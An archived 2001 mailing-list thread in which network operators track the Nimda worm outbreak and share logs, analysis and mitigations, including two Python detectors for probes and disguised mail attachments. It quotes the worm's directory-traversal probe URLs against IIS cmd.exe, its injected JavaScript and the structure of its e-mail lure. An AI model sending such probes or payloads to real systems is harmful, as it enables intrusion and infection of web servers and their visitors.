Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.

Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :(

Kevin
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.

owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"

--
echo "send pgp key" | mail ravi@cow.org

"It's like everybody's trying to find a reason for the shootings. Whatever happened to 'crazy?'" -- Chris Rock's explanation for the Littleton, CO., school shootings, quoted in The Dallas Morning News.
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.

i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he dissected code red's activity and presented a summary.

cert is of course, http://www.cert.org.

deeann m.m. mikula
director of operations
telerama public access internet
http://www.telerama.com
1.877.688.3200
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.

On Tue, 18 Sep 2001, deeann mikula wrote:
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he dissected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations
telerama public access internet
http://www.telerama.com
1.877.688.3200
James Smallacombe   PlantageNet, Inc. CEO and Janitor
up@3.am             http://3.am
=========================================================================
We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this.

Best regards,
Bryan Heitman
CommuniTech.Net, Inc.

----- Original Message -----
From: <up@3.am>
To: <nanog@merit.edu>
Sent: Tuesday, September 18, 2001 10:05 AM
Subject: Re: Worm probes
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
On Tue, 18 Sep 2001 10:22:06 CDT, Bryan Heitman <bryanh@communitech.net> said:
We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this.
This seems to be the culprit:

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

I've nailed a copy, and am working on getting it to the right security people. A *PRELIMINARY* look (eyeballing the output of 'strings') indicates that this one *both* sends itself via e-mail a la SirCam, *AND* scans for vulnerable web servers, and if it finds a vulnerable server, it causes anybody visiting that webpage to be offered a contaminated .exe as well. I do *NOT* have a handle on what malicious effects it has other than just propagating.

This one's nasty, folks...

--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

I've nailed a copy, and am working on getting it to the right security people. A *PRELIMINARY* look (eyeballing the output of 'strings') indicates that this one *both* sends itself via e-mail a la SirCam, *AND* scans for vulnerable web servers, and if it finds a vulnerable server, it causes anybody visiting that webpage to be offered a contaminated .exe as well. I do *NOT* have a handle on what malicious effects it has other than just propagating.
I work at a large university and our security guys think this guy is what's been causing us problems all morning. Lots of subnet scans (tons of incomplete arps), CC Mail servers are whacking out, HPOV noting that old 3Com gear is dropping etc. This is what I've heard through the rumor mill (so take it with a grain of salt)...

"...At first blush, it spreads itself by web, email, and maybe shares. We've seen it spreading by a set of two HTTP requests. It will look for backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp to copy itself to the target machine then launches it via a second HTTP command."

Eric :)
Folks,

If anyone has a packet capture of the infection in progress, would you please contact me. I would like to get it to some of the Cisco IOS folks ASAP. (Not my official job, but would like to help.)

Thanks!!
Michael Airhart

At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:
I work at a large university and our security guys think this guy is what's been causing us problems all morning. Lots of subnet scans (tons of incomplete arps), CC Mail servers are whacking out, HPOV noting that old 3Com gear is dropping etc. This is what I've heard through the rumor mill (so take it with a grain of salt)...
"...At first blush, it spreads itself by web, email, and maybe shares. We've seen it spreading by a set of two HTTP requests. It will look for backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp to copy itself to the target machine then launches it via a second HTTP command."
Eric :)
--------------------------------------------------------------------------------------------------------
Michael Airhart                 512/378-1246 Office
Consulting Systems Engineer     413/480-1958 eFax
Cisco Systems, Inc.             800/365-4578 Pager
12515 Research Blvd             mairhart@cisco.com
Austin, TX 78759
Appears that if it gets a 404 back from its initial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) it attempts to get the server to tftp a file named "admin.dll" from the scanning system.

I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):

1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e".
6. creates a file named readme.exe which is actually a wav file (weird?)

I could be totally wrong here (and probably am) but oh well...

Chris
indeed. scanning for strings that appear to be associated with the Concept Virus(CV) V.5, there is a tremendous increase in bandwidth usage. today alone i match:

/scripts:        18013
/_vti_bin:        1885
_mem_bin:         1916
/ms_adc/:         1945
/winnt/system32: 27648

bugtraq is starting to get in the preliminary reports of this worm. beware that infected host's home pages contain a javascript that sends you to a page that attempts to send you a copy of the worm. fantastic, eh?

-r

On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am said at one point in time:
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
--
echo "send pgp key" | mail ravi@cow.org ; ravi@happy:/home/ravi# rm -rf /bin/laden

"Now I don't want you to worry, class. These tests will have no effect on your grades. They merely determine your future social status and financial success. If any." -- Mrs. Krabappel
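An added example (not code from the thread) that turns the two things ravi posted above into a script: it parses Apache access-log lines like the ones in his first message, undoes the double-percent-encoding and overlong-UTF-8 tricks so every variant collapses to the same root.exe / cmd.exe path, and then produces the per-prefix tally from his second message plus the list of unique probing clients that an ACL or host-route block would be built from. The log lines below are constructed, with documentation addresses in place of real clients.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines in Apache common log format, modelled on the probe
# sequence quoted in this thread; client addresses are made-up documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
203.0.113.5 - - [18/Sep/2001:09:56:01 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Sep/2001:09:56:01 -0400] "GET /scripts/contact.pl?name=a HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Sep/2001:09:56:02 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# What every variant in the thread resolves to once the encoding tricks are undone.
PROBE_RE = re.compile(r"root\.exe|/winnt/system32/cmd\.exe")


def decode_iis_style(target: str) -> str:
    """Collapse the encodings the probes rely on into one plain, lower-case path.

    Two rounds of percent-decoding turn %255c into %5c and then into a backslash;
    the overlong two-byte UTF-8 forms (%c0%af, %c1%9c, %c1%1c) are folded the way a
    lenient decoder would: ((b0 & 0x1f) << 6) | (b1 & 0x3f), which yields '/' or '\\'.
    """
    raw = unquote_to_bytes(unquote_to_bytes(target))
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/").lower()


def is_worm_probe(target: str) -> bool:
    """True for the root.exe backdoor and cmd.exe traversal requests seen in the thread."""
    return PROBE_RE.search(decode_iis_style(target)) is not None


def summarize(log_text: str) -> dict:
    """Tally probes per first path segment (the /scripts, /_vti_bin, ... counts ravi
    reports above) and collect the unique probing clients."""
    per_prefix = Counter()
    probers = set()
    lines = probes = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        lines += 1
        target = m.group("target")
        if not is_worm_probe(target):
            continue
        probes += 1
        probers.add(m.group("client"))
        # count by the undecoded first segment, which is how the probes group in the logs
        per_prefix["/" + target.lstrip("/").split("/", 1)[0].lower()] += 1
    return {
        "lines": lines,
        "probes": probes,
        "per_prefix": dict(per_prefix),
        "probers": sorted(probers),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for prefix, n in sorted(report["per_prefix"].items()):
        print(f"{prefix:<12} {n}")
    print("unique probing clients:", ", ".join(report["probers"]))
```

Feeding a real access log through summarize() instead of SAMPLE_LOG gives the same two outputs for your own server; the probers list is what the later suggestions in this thread (iptables rules, host routes) consume.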
This is new - it modifies the web pages of the infected machine to include a (I assume) virus. It adds this string to the web page:

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

Viewing infected web servers may be dangerous.

Mark Radabaugh
Amplex
(419) 833-3635
Follow up...

The web page on infected servers includes a script to send and open the file 'readme.exe' on windows machines. I do not know the details of what the executable does yet.

Mark
I just received this update from Sophos. Perhaps this is the virus that is spreading?

=== Tim

**********************************************
Tim Winders, MCSE, CNE, CCNA
Associate Dean of Information Technology
South Plains College
Levelland, TX 79336
Phone: 806-894-9611 x 2369
FAX: 806-894-1549
Email: TWinders@SPC.cc.tx.us
**********************************************

Date: Tue, 18 Sep 2001 16:45:07 +0100 (BST)
From: Sophos Alert System <listmaster@sophos.com>
Reply-To: sophos-list-bounce@sophos.com
To: Undisclosed recipients: ;
Subject: Sophos Anti-Virus IDE alert: W32/Nimda-A

Name: W32/Nimda-A
Type: W32 executable file virus
Date: 18 September 2001

A virus identity file (IDE) which provides protection is available now from our website and will be incorporated into the November 2001 (3.51) release of Sophos Anti-Virus.

Sophos has received many reports of this virus from the wild.

Description:
W32/Nimda-A is an email-aware virus that spreads using an attached filename of README.EXE.

Sophos researchers are continuing to examine the virus and will be posting a more detailed description of the virus on the Sophos website once the analysis is complete.

Download the IDE file from http://www.sophos.com/downloads/ide/nimda-a.ide
Read the analysis at http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Download a ZIP file containing all the IDE files available for the current version of Sophos Anti-Virus from http://www.sophos.com/downloads/ide/ides.zip
Read about how to use IDE files at http://www.sophos.com/downloads/ide/using.html
To unsubscribe from this service please visit http://www.sophos.com/virusinfo/notifications

On Tue, 18 Sep 2001, Mark Radabaugh - Amplex wrote:
Follow up...
The web page on infected servers includes a script to send and open the file 'readme.exe' on windows machines. I do not know the details of what the executable does yet.
Mark
I just got an e-mail with

Subject: Central Command News for 09/14/2001 (Virus Update Notification)

It had readme.exe attached to it. Obviously one should not open this.

Time to create a new .procmail rule.

On Tue, Sep 18, 2001 at 11:23:30AM -0500, Tim Winders wrote:
I just received this update from Sophos. Perhaps this is the virus that is spreading?
-- snip --
Description:
W32/Nimda-A is an email-aware virus that spreads using an attached filename of README.EXE.
Sophos researchers are continuing to examine the virus and will be posting a more detailed description of the virus on the Sophos website once the analysis is complete.
--
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.
It is worse than that. The virus is passing itself off as audio/x-wav;

----- Original Message -----
From: "Jim Seymour"
Newsgroups: spamcop.geeks
Sent: Tuesday, September 18, 2001 11:10 AM
Subject: New Virus/Worm Email
I just received an interesting email. It made it past my virus filters, but a report on the NTBugTraq mailing list is reporting it as some kind of unknown worm that attacks IIS machines.
The message itself uses an attachment with a content type of audio/x-wav, but with a name of "readme.exe". I've got the security settings tightened down, but even so, Outlook Express asked me whether I wanted to open the embedded attachment.
Here is the email that I received (without the encoded attachment, of course). Note the long Subject line and the HTML iframe that refers to local content. Keep your eye on this one...
-- Jim Seymour
-----------------------------------------------------------------------
Received: from TGLNT (mail.tricongroup.com [206.206.91.131]) by mail.cipher.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id SVNKL1PC; Tue, 18 Sep 2001 08:15:28 -0700
From: <3dzvi51gehej@4ax.com>
Subject: Xtoprecvranalyzerdiskstrreadmec2supprttablecoltoprecvraps32analyzerdefaultusergrpcinforccidbutilappevent
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Slightly off-topic here...(I guess) I'm looking for anyone that is using Extreme Networks gear and that may be having difficulty with OSPF or STP. Please contact me off list... OT Flames encouraged!

--
Richard Sena               The MITRE Corporation    e: rsena@mitre.org
Lead Engineer              202 Burlington Road      v: +1-781-271-3712
Dept: R10N; MS C020        Bedford, MA 01730-1420   f: +1-781-271-2600
On Tue, 18 Sep 2001, Jared Mauch wrote:
Time to create a new .procmail rule.
:0 B
* >50000
* <90000
* ^Content-Type: audio/x-wav;$ name="readme.exe"
VirusTrapHere

==========================================================
Chris Candreva  -- chris@westnet.com -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/
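An added Python check (example code, not from the thread) that does in a mail filter what the procmail recipe above does, using the message structure Jim Seymour posted: it walks the MIME parts, flags an attachment whose filename has an executable extension but whose declared type is not an application type (the audio/x-wav trick), flags a part whose decoded bytes begin with the MZ executable header whatever its label, and flags an HTML part whose hidden iframe auto-loads such a part through a cid: reference. The message below is constructed to copy that shape; its base64 body is four dummy bytes, and the addresses and Content-ID are made up.

```python
import re
from email import message_from_string
from email.policy import default as DEFAULT_POLICY

# Extensions that Windows will execute on open; a non-application MIME type on one of
# these is the mislabelling the thread describes (audio/x-wav carrying readme.exe).
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")

# Constructed message copying the shape of the sample posted above: multipart/related
# wrapping a multipart/alternative HTML part whose hidden iframe points, via cid:, at an
# audio/x-wav part named readme.exe. The base64 body is four dummy bytes starting "MZ".
SAMPLE_MESSAGE = """\
From: <sender@example.invalid>
To: <recipient@example.invalid>
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_OUTER_===="
X-Priority: 3

--====_OUTER_====
Content-Type: multipart/alternative; boundary="====_INNER_===="

--====_INNER_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:readme-part-0001 height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_INNER_====--

--====_OUTER_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <readme-part-0001>

TVqQAA==
--====_OUTER_====--
"""

IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^"\'\s>]+)', re.I)


def analyze(raw_message: str) -> list:
    """Return a list of findings describing why the message looks like the worm mailer.

    Three independent checks, so a message is still caught when only one trick is used:
    an executable filename under a non-application MIME type, a part whose decoded
    bytes carry the MZ (PE) header despite its declared type, and an HTML iframe that
    auto-loads such a part through a cid: reference.
    """
    msg = message_from_string(raw_message, policy=DEFAULT_POLICY)
    findings = []
    by_cid = {}  # Content-ID -> (filename, declared content type)
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        cid = (part.get("Content-ID") or "").strip("<> ")
        if cid:
            by_cid[cid] = (name, ctype)
        if name.endswith(EXEC_EXTENSIONS) and not ctype.startswith("application/"):
            findings.append(f"attachment {name!r} is declared {ctype} but has an executable extension")
        payload = part.get_payload(decode=True) or b""
        if payload.startswith(b"MZ") and not ctype.startswith("application/"):
            findings.append(f"part {name or cid!r} is declared {ctype} but begins with the MZ executable header")
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for ref in IFRAME_CID_RE.findall(part.get_content()):
            target = by_cid.get(ref)
            if target and target[0].endswith(EXEC_EXTENSIONS):
                findings.append(f"hidden iframe auto-loads cid:{ref}, which is the {target[0]!r} attachment")
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_MESSAGE):
        print("QUARANTINE:", finding)
```

Unlike the size window in the procmail recipe, none of these checks depends on the attachment's length, so a re-packed copy of the same file is still caught.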
I protected against readme.exe specifically several weeks ago. I also proactively filter all incoming emails for executable attachments.

[Begin sample]

Regarding your message to x
msgid=<x@x.x.net>

You are receiving this message due to the fact a possible email attack was detected passing through our mail servers from you. This was probably due to a file attachment. As many of these attachments can run on their own we only allow harmless file types to be sent. If you wish to send this file anyway please use a compression program.

If you have further questions please do not hesitate to give me a call at the number below.

Bill Larson
blarson@compu.net
Network Administrator
[Phone numbers here]

REPORT: Trapped poisoned executable "readme.exe"
REPORT: Not a document, or already poisoned by filename. Not scanned for macros.
STATUS: Message quarantined, not delivered to recipient.

--
Message sanitized on ns1.compu.net
See http://www.impsec.org/email-tools/procmail-security.html for details.

[End sample]

Hopefully the notification does some good.
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like Smurf amplifiers, and the problem is just that the admins are clueless or unreachable?

So far the most prolific network probing us has belonged to 9NetAve, which was bought by Concentric shortly before they became XO.

Kevin
On Tue, Sep 18, 2001 at 01:36:48PM -0400, sigma@pair.com wrote:
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like Smurf amplifiers, and the problem is just that the admins are clueless or unreachable?
So far the most prolific network probing us has belonged to 9NetAve, which was bought by Concentric shortly before they became XO.
I got so far about 205 unique IPs from the scans. If anyone is interested I can put them on a webpage. Or even put quickly a script with db in the back for other people to provide their list of IPs.
--
Regards, Ulf.

---------------------------------------------------------------------
Ulf Zimmermann, 1525 Pacific Ave., Alameda, CA-94501, #: 510-865-0204
On Tue, 18 Sep 2001 13:36:48 EDT, sigma@pair.com said:
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like
This also has an e-mail vector and a web DOWNLOAD vector.

There may be lots of vulnerable NT servers, but there's a lot MORE copies of Outlook and Internet Explorer out there.

Think SirCam *AND* CodeRed *AND* the infect-a-surfer vector....

--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
We found the following on an infected server also:

For each share on the server, it generates a .eml file and puts it in the root of the share. It then creates an index.asp, index.htm, default.asp and default.htm on the root of the share which points to and downloads the .eml file from the root of the share.

Neat thing is, anyone with Active Desktop (View my Desktop as a Web Page) enabled is going to get it, presumably. Simply by browsing the shared directory.

It looks like it morphs the .eml file names too. Not all are "readme.eml", although they all are ~ 79K in size.

Happy disinfecting. My customer on the end of a 56K FR link was fsck'd this afternoon.

Welcome to IT during the first war of the 21st century ...

Eric

==========================================================================
Eric Germann
CCTec                          ekgermann@cctec.com
Van Wert OH 45801              http://www.cctec.com
                               Ph:  419 968 2640
                               Fax: 603 825 5893

"It is so easy to miss pretty trivial solutions to problems deemed complicated. The goal of a scientist is to find an interesting problem, and live off it for a while. The goal of an engineer is to evade interesting problems :)" -- Vadim Antonov <avg@kotovnik.com> on NANOG
-----Original Message-----
From: owner-nanog@merit.edu [mailto:owner-nanog@merit.edu]On Behalf Of Valdis.Kletnieks@vt.edu
Sent: Tuesday, September 18, 2001 2:34 PM
To: sigma@pair.com
Cc: nanog@merit.edu
Subject: Re: Worm probes
This also has an e-mail vector and a web DOWNLOAD vector.
There may be lots of vulnerable NT servers, but there's a lot MORE copies of Outlook and Internet Explorer out there.
Think SirCam *AND* CodeRed *AND* the infect-a-surfer vector....

--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
well good grief

unfortunately code red is using all our disk space at the moment. (how inconsiderate of the perpetrators)

if anyone is in position to donate/lend a 7-10TB RAID to caida to capture better (more) data for these things, plz let me know. (hey, tax writeoff or just lend us inventory you can't get rid of this quarter anyway)

given what this code-rainbow stuff is doing to people's apache logs as well, i have to wonder if the worm authors are trading in options on EMC, etc.

yeesh
pathetic new [technology + same] world in so many ways
On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am wrote:
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
I'm sitting behind a dialup box right now, and I just added a log clause to an ipf rule matching connection attempts to port 80. I'm averaging 35 probes per minute. Blocking them is quite beneficial to performance on a v.34 connection :) Joe
At 09:54 AM 9/18/01, sigma@pair.com wrote:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :(
First ones appeared today, and so far I see 17650 attempts on just one of my servers. We don't run any Microsoft stuff either, but that doesn't keep our servers from getting hammered...

-----------------------------------------------------------------
Daniel Senie                                        dts@senie.com
Amaranth Networks Inc.                    http://www.amaranth.com
Yes, I saw... I just contacted our local NIC security guys and they told me that there are two new worms. One is exploiting the backdoors left by codered 2, and another worm is (possibly) a "codered 3", which is defacing the web pages with anti-chinese and anti-poisonbox messages...

Today is the day... :-((((

On Tue, 18 Sep 2001 sigma@pair.com wrote:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :(
Kevin
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
spc> probes this morning? We're seeing about 8000/second, starting around 9:15

Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.

thanks,
-joe
At 12:51 PM 9/18/01, Joseph McDonald wrote:
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
spc> probes this morning? We're seeing about 8000/second, starting around 9:15
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or better: script which causes a filter rule to be added to ipchains list, blocking all ports.

-----------------------------------------------------------------
Daniel Senie                                        dts@senie.com
Amaranth Networks Inc.                    http://www.amaranth.com
On Tue, 18 Sep 2001, Joseph McDonald wrote:
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
spc> probes this morning? We're seeing about 8000/second, starting around 9:15
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
<--( SNIP )--> That would still allow the malicious network traffic to traverse your network. I'm not seeing more than about 60 unique hosts that are scanning ( YMMV ), so that isn't a huge hit for me ACL-wise ( again YMMV ). Your choice, let them bang on your router or your web servers. Depends on your situation. .z
On Tue, 18 Sep 2001, Joseph McDonald wrote:
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or what about this: redirect your 404 to a PHP script with something like:

ErrorDocument 404 /404.php

and then let a script like this waste the attacker's time:

<?
echo "404 This page is not available.\n";
flush();
sleep(150);
?>

This should slow the scanning and thus the waste of bandwidth and spread rate of the infections down. At least, if the worm is single threaded.

Iljitsch van Beijnum
I'm gonna suggest this one more time:

LaBrea, from http://www.threenorth.com/LaBrea

should make these attacks slow down like they're wading through molasses. Now, if most or all ISPs installed tarpits like this it would seriously reduce the virulence of the attacks.

Just my $0.02 worth.

David Leonard
ShaysNet

On Tue, 18 Sep 2001, Iljitsch van Beijnum wrote:
On Tue, 18 Sep 2001, Joseph McDonald wrote:
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or what about this: redirect your 404 to a PHP script with something like:
ErrorDocument 404 /404.php
